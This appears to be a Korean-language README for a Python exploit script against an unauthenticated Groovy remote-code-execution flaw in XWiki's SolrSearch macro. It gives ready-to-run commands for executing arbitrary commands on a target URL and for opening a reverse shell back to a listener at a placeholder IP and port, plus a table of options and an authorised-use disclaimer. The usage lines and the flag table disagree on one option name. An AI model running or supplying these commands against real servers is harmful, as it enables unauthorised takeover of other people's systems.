
XWiki 인증되지 않은 RCE Exploit for Reverse Shell
XWiki 인증되지 않은 RCE 익스플로잇
영향을 받는 XWiki 버전은 SolrSearch 매크로에서 안전하지 않은 Groovy 표현식 처리로 인한 원격 코드 실행 취약점을 포함합니다. 인증되지 않은 공격자는 원격으로 임의의 Groovy 코드를 실행하고 리버스 셸을 획득할 수 있습니다.
이 익스플로잇은 대상 시스템에서 코드를 실행하고 리버스 셸을 설정하는 데 사용할 수 있습니다. 두 가지 모드를 사용할 수 있습니다: 대화형 또는 파라미터 기반. 익스플로잇은 자동으로 리스너를 시작하거나 기존 리스너를 사용할 수 있습니다.

python3 xwiki_groovy_rce.py
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com
# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480
# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
-h/--help: 도움말 메뉴 표시
-u/--url: 대상 XWiki URL (필수)
-r/--reverse-shell: 리버스 셸 실행
-c/--command: 단일 명령 실행
-i/--ip: 리스너 IP 지정 (리버스 셸 전용)
-p/--port: 리스너 포트 지정 (리버스 셸 전용, 기본값=4444)
--no-listener: 리스너를 시작하지 않음 (리버스 셸 전용)
이 개념 증명은 교육 및 승인된 테스트 목적으로만 사용하십시오.
소유하지 않거나 명시적 테스트 허가가 없는 시스템에 대한 무단 사용은 불법입니다.
저자는 이 정보의 오용에 대해 책임을 지지 않습니다.